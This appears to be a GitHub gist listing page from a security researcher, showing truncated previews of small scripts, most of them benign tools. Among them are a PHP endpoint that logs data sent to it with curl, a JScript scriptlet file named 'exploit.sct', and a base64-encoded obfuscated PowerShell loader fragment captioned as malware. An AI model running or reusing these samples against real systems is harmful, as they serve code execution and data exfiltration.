Skip to content

Instantly share code, notes, and snippets.

View h4sh5's full-sized avatar

h4sh h4sh5

121 followers · 12 following
View GitHub Profile
@h4sh5
h4sh5 / patch_nops.py
Created July 3, 2023 14:01
patch hex patterns in file
#!/usr/bin/env python3
import re
import binascii
import sys
import time
if len(sys.argv) < 3:
print("usage: %s <file> <hex pattern> [replace pattern (default all NOPs)]" %sys.argv[0])
exit(1)
@h4sh5
h4sh5 / swagger_check_sec.py
Created June 23, 2023 04:28
check swagger docs for security or the lack thereof
#!/usr/bin/env python3
import yaml
import sys
filename = sys.argv[1]
with open(filename,'r') as f:
d = yaml.safe_load(f)
if 'security' in d:
@h4sh5
h4sh5 / squeeze_two_cols.sh
Created March 30, 2023 13:01
using pandoc to squeeze a lot fo text into an A4 page
(echo -e "---\nclassoption:\n- twocolumn\nlinestretch: 0\n---"; cat $1) | pandoc --variable papersize="A4" --variable margin-left="0.2cm" --variable margin-right="0.2cm" --variable margin-top="0.2cm" --variable margin-bottom="0.2cm" --variable fontsize="8pt" - -o $1.pdf
@h4sh5
h4sh5 / log.php
Created December 27, 2022 01:23
log request data
<?php
// a script that just logs stuff, from something like echo 123 | curl -d@- url
$entityBody = file_get_contents('php://input');
file_put_contents('just_the_log.txt', "\n---" . $_SERVER["REMOTE_ADDR"] . "|" . $_SERVER["HTTP_X_FORWARDED_FOR"] . "|" . $entityBody, FILE_APPEND | LOCK_EX);
?>
@h4sh5
h4sh5 / sites_enabled_default
Created December 26, 2022 20:13
nginx config
# an exmaple, not guaranteed to work
server {
listen 443 ssl;
listen [::]:443 ssl;
server_name example.com;
root /var/www/html;
# even /upload , or any other path, unless specified, will be redirected to index.php
@h4sh5
h4sh5 / parse_maillogs.py
Created October 30, 2022 03:37
parse mail logs and extract all base64 encoded attachments
#!/usr/bin/env python2
import sys
import os
import base64
file = sys.argv[1]
# os.mkdir('out')
with open(file,'rb') as f:
lastblock = ''
@h4sh5
h4sh5 / emailsink.py
Created October 27, 2022 12:26
simple email sink server
#!/usr/bin/env python3
from __future__ import print_function
from datetime import datetime
import asyncore
from smtpd import SMTPServer
class EmlServer(SMTPServer):
no = 0
def process_message(self, peer, mailfrom, rcpttos, data):
filename = '%s-%d.eml' % (datetime.now().strftime('%Y%m%d%H%M%S'),
@h4sh5
h4sh5 / gistclone.py
Created July 3, 2022 02:14
clone gists to current dir
#!/usr/bin/env python3
import json
import urllib
from subprocess import call
#from urllib import urlopen
from urllib.request import Request, urlopen
import os
import sys
USER = sys.argv[1] #os.environ['USER'] # or edit as appropriate
@h4sh5
h4sh5 / exploit.sct
Last active June 26, 2022 02:46
sct badness
<?XML version="1.0"?>
<scriptlet>
<!-- SCT badness -->
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
@h4sh5
h4sh5 / somedataboi
Created June 26, 2022 02:36
malware? what? nooo
ZnVuY3Rpb24gcE0xclZ2UG5fbUh7cGFyYW0oJFVCOFQzN0hVUDl3OHNVN0NkNXBqKTskcDliV1FH
ZSA9IFtpbnRdJHVCOHQzN2hVcDl3OFNVN0NENXBqWzBdOyRoSmpjTEt4akd0dWwyN2RGID0gJyc7
Zm9yKCRaVW5OdXd1MldIYVJpSHVOTHVSID0gKDIgLSAxKTskWnVubnVXdTJ3aEFSSUh1TmxVUiAt
bHQgJHVCOHQzN2h1cDlXOHN1N0NENVBKLmxlbmd0aDskelVuTlV3dTJ3aEFySUhVTmxVUiArPSAy
KXskSEpKY0xLWGpHVFVMMjdkZiArPSBbY2hhcl0oKFtpbnRdKDQ4IC8gMykpICogKFtpbnRdJHVi
OFQzN0h1UDlXOHNVN0NENXBqWyR6VU5OdVd1MndIYXJJSHVOTFVSXSAtICRQOWJXcWdlKSArIChb
aW50XSR1QjhUMzdodXA5VzhzdTdjZDVwalskelVOTlVXdTJXSGFyaUh1TmxVUiArIDFdIC0gJHA5
YndRZ2UpKTt9cmV0dXJuICRoSkpDTEt4SkdUdWwyN0RmO307JEs4c2puRVNpTUE9W1N5c3RlbS5D
b252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygocE0xclZWcE5fbWgoJztAP0BBQjxAPD88Pzw/SD88
Pzw/PD88P0A/PD88Pzw/PD1KPUo+Qz88Pzw/R0FCPzw/PD88Pzw/PD88Pzw/PD88QDw/PD88Pzw/